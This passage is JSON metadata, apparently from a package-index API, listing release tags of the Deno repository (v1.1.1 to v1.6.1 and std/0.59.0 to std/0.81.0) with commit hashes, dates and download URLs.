parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"